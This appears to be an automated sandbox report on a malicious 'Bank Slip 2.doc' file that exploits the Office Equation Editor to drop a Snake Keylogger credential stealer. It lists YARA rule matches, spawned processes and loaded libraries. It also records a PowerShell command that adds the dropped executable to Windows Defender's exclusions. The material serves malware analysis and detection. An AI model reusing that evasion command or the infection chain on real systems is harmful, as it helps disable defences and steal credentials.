            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005725D17_2_005725D1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00570BD07_2_00570BD0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057BBD07_2_0057BBD0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00570BC27_2_00570BC2
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057BBC17_2_0057BBC1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005759F27_2_005759F2
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573FF07_2_00573FF0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A5F07_2_0057A5F0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A5E17_2_0057A5E1
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005725E07_2_005725E0
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573FEA7_2_00573FEA
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573B987_2_00573B98
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A1987_2_0057A198
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005755987_2_00575598
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005721887_2_00572188
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00573B887_2_00573B88
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_0057A1887_2_0057A188
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_005755A87_2_005755A8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_006900407_2_00690040
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_00690CD87_2_00690CD8
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_006906907_2_00690690
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeCode function: 7_2_006900067_2_00690006
            Source: Bank Slip 2.doc, type: SAMPLE | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3599d70.8.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3579550.10.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 7.2.obie8920193.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000007.00000002.864143938.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000005.00000002.366574375.0000000003579000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obie8920193.exe PID: 3152, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: obie8920193.exe PID: 3244, type: MEMORYSTR | Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
            Source: FcdBUj68lnCbMtB[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: obie8920193.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, zi--.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
            Source: 5.2.obie8920193.exe.3599d70.8.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, zi--.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
            Source: 5.2.obie8920193.exe.3579550.10.raw.unpack, ----.cs | Cryptographic APIs: 'TransformFinalBlock' (2 occurrences)
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: _0020.SetAccessControl
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: _0020.SetAccessControl
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, BR4r9SHUAmvVNPGE5t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, BR4r9SHUAmvVNPGE5t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, BR4r9SHUAmvVNPGE5t.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: _0020.SetAccessControl
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.cs | Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 5.2.obie8920193.exe.4c0000.2.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 5.2.obie8920193.exe.2734d44.5.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: 5.2.obie8920193.exe.2755f14.7.raw.unpack, ReactionVessel.cs | Suspicious method names: .ReactionVessel.Inject
            Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@9/14@25/5
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$nk Slip 2.doc
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Mutant created: NULL
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR737A.tmp
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 entries)
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | File read: C:\Windows\System32\drivers\etc\hosts (21 entries)
            Source: Bank Slip 2.doc | ReversingLabs: Detection: 39%
            Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Process created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64win.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: wow64cpu.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: msi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: cryptsp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rpcrtremote.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dwmapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: version.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: secur32.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winhttp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: webio.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: iphlpapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: winnsi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dnsapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: nlaapi.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc6.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: dhcpcsvc.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: rasadhlp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: credssp.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: ncrypt.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: bcrypt.dll
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Section loaded: wow64win.dll
            Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Section loaded: wow64cpu.dll
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\obie8920193.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Bank Slip 2.LNK.0.dr | LNK file: ..\..\..\..\..\Desktop\Bank Slip 2.doc
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\obie8920193.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

            Data Obfuscation

Source: FcdBUj68lnCbMtB[1].exe.2.dr, OptionsWindow.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: obie8920193.exe.2.dr, OptionsWindow.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.cs | .Net Code: LjBwfxGmLB5enfYePel System.Reflection.Assembly.Load(byte[])
Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.cs | .Net Code: LjBwfxGmLB5enfYePel System.Reflection.Assembly.Load(byte[])
Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.cs | .Net Code: LjBwfxGmLB5enfYePel System.Reflection.Assembly.Load(byte[])
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D5355 push esp; ret 2_2_005D5357
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D887D push dword ptr [esi+ebp*4-4Eh]; ret 2_2_005D8883
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005CA67E push ecx; iretd 2_2_005CA67F
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D667A push esp; ret 2_2_005D667B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D666A push esp; ret 2_2_005D666B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005C8F60 push eax; retf 2_2_005C8F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D6319 push ebp; ret 2_2_005D631B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D6311 push ebp; ret 2_2_005D6313
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D4E01 push ebx; ret 2_2_005D4E1B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D4E2A push ebx; ret 2_2_005D4E2B
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D6C25 push esp; ret 2_2_005D6C27
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D4E22 push ebx; ret 2_2_005D4E23
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_005D66D1 push esp; ret 2_2_005D66EB
